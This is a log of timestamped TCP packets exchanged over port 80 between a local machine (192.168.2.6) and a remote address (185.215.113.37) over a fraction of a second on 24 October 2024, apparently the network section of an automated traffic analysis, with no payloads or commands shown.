Oct 24, 2024 13:02:19.240387917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241092920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241103888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241121054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241132975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241144896 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241156101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241168022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241178989 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241189957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241199017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241206884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241219044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241231918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241242886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241254091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241261959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241272926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241285086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241292000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241307020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241316080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241331100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241338015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241369009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.241970062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.241981983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242002010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242012978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242021084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242034912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242046118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242053032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242065907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242074966 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242084026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242099047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242104053 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242114067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242126942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242136002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242147923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242156029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242168903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242176056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242320061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242896080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242907047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242924929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242933989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242949009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242957115 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242970943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.242984056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.242990017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243000031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243010044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243019104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243026972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243036985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243042946 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243058920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243063927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243076086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243079901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243093014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243099928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243108034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243120909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243134975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243151903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243824959 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243837118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243855000 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243876934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243886948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243897915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243908882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243916988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243927002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243937016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243947029 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243954897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243971109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.243978977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.243992090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244004011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244010925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244020939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244026899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244038105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244050980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244056940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244069099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244076014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244086027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244098902 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244115114 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244132042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244765043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244776011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244792938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244802952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244812965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244824886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244834900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244851112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244857073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244874001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244883060 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244889975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244901896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244915009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244920969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244935989 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244941950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244951010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244961977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.244987011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.244997025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245019913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245035887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245050907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245742083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245754004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245769978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245781898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245790958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245803118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245811939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245821953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245835066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245841026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245853901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245862007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245868921 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245882988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245896101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245904922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245914936 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245924950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245940924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245950937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245964050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245970011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.245984077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.245991945 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246006012 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246011019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246022940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246051073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246619940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246630907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246648073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246659040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246665955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246680021 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246691942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246700048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246710062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246718884 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246727943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246736050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246752024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246757984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246771097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.246786118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.246803045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.323774099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.323826075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.323837042 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.323899031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.323924065 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.323935032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.323971033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.324575901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.324589968 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.324606895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.324630976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.324646950 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.356972933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357013941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357068062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357069016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357106924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357117891 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357144117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357153893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357183933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357188940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357228041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357237101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357276917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357295036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357311964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357322931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357351065 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357361078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357381105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357398987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357426882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357471943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357513905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357538939 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357547998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357562065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357585907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357592106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357635975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357698917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357744932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357769012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357805967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357815027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357841015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357851028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357876062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357884884 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357909918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357918978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357944965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357952118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.357980967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.357994080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358019114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358031034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358062983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358174086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358211040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358220100 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358257055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358293056 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358326912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358351946 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358378887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358421087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358469963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358478069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358504057 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358509064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358537912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358552933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358573914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358578920 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358612061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358620882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358649969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358669043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358690977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358901978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358944893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.358989954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.358997107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359023094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359036922 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359040022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359055042 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359061956 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359071970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359076977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359090090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359092951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359106064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359113932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359123945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359133959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359141111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359152079 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359153032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359159946 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359167099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359179020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359210968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359502077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359512091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359554052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359611034 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359644890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359673977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359708071 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359713078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359735966 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359743118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359755039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359778881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359786987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359812021 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.359827995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.359862089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360105991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360140085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360156059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360176086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360184908 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360209942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360218048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360244989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360253096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360277891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360284090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360315084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360317945 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360352993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360589027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360622883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360644102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360657930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360661983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360692978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360696077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360729933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360733032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360764980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360791922 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360799074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360806942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360833883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360840082 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360867977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360896111 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360901117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360918045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360937119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.360961914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.360969067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.361004114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.361007929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.361017942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.361038923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.361071110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.361087084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.361443043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.361494064 CEST	49711	80	192.168.2.6	185.215.113.37
